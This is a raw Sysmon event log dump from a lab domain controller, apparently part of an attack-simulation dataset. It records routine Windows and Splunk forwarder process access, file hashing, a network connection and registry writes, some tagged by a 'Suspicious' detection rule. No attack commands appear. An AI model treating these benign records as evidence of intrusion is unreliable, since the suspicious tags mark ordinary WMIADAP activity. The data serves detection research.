10341000x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:53.007{266CAFBE-6472-6064-2300-00000000AE01}29322948C:\Windows\servicing\TrustedInstaller.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:54.412{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADFD16F728C4CE2FB049E0E7B32FE56A,SHA256=25B6745B1E7AA31566F1BFF37C1A3C8F4D3C8712F28751DB6FB29AEC9EE7196F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:54.397{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DEFF01B16D876F73469315D93BDA2555,SHA256=83A1DB6F393AE019756EF58D51568818E7069AAEF10A0183944D19349BE6E994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:55.443{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA1649A4C42CE06D781F2B993D807A7,SHA256=D2188D62234AFF0432F0CD43600F6462F9C0D996A37A9AA723ECBBC1DCC75B2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:56.567{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E40C19BEBFD3F196A51CBF6C370C4E8,SHA256=AC8B23B58230C48D736F00D04E4C31A78D6497C3D9D4AC10040CF04FFEF7650A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:57.660{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3DE25AEA1033360249622DF86155551,SHA256=B5C40478703E66166291B225A3D4F4FE981AD0964936071C359DAC35E141E0A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:58.674{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE549150D0B1B28A5C5C377F2EB05922,SHA256=338D17FFDABBC427A98907F87D130B6F119D31E8699A3853BBBA160E691DC56D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:59.751{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ACBF75B8CE274CECA8EBDC11073877B,SHA256=027DCD0CB4501AC971FC7CFED0A2340F82D435EB4DF61E6FB7A8C836F179A467,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:57.572{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53634-false10.0.1.12-8000- 23542300x80000000000000009565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:00.829{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE037C3FD104B8E35BAF7CE2375F2ABB,SHA256=12B70180C8A3B3016B055D45266011FC3B6519C2CEF34BF43759EBFCBA3A6728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:01.921{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6403F5E158109F660A4FDD73C1835D9,SHA256=B1D4914673A6DAEB55B321921A4D2987A0F552B98068BD44E0E244CA7302BE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:01.797{266CAFBE-655C-6064-4201-00000000AE01}6936NT 
AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.iniMD5=FFDEEA82BA4A5A65585103DD2A922DFE,SHA256=C20B11DFF802AA472265F4E9F330244EC4ACA81B0009F6EFCB2CF8A36086F390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.983{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990A0A1CE8D3B3931859DEC59C5C871F,SHA256=A4DB73E56E879361330E32DBE6F334A24C12869FE34DCED29E881ED01E124E91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.936{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 12241200x80000000000000009606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000009605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 
12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25952 25958 25968 25978 25998 26042 26052 26090 26096 26112 13241300x80000000000000009604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x00006561) 13241300x80000000000000009603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x00006560) 13241300x80000000000000009602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x00006607) 13241300x80000000000000009601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x00006606) 13241300x80000000000000009600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x00006607) 
13241300x80000000000000009599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x00006606) 23542300x80000000000000009598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.TMPMD5=CE113E5C22BF5C94F0E20EDC21911A8F,SHA256=2C508A5B5CCA1729CB8848F04E75F5F0DF3244DC33FB99F0CEAAEA527A21F9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.919{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.INIMD5=FE193A892289F5307681F00B4CA3AD8E,SHA256=3DE849701FECDD6631F36EC47E3C7B883B1B83BDC4A97A8DA46A9CC58ACC3CE8,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.803{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000009595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.801{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 10341000x80000000000000009594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
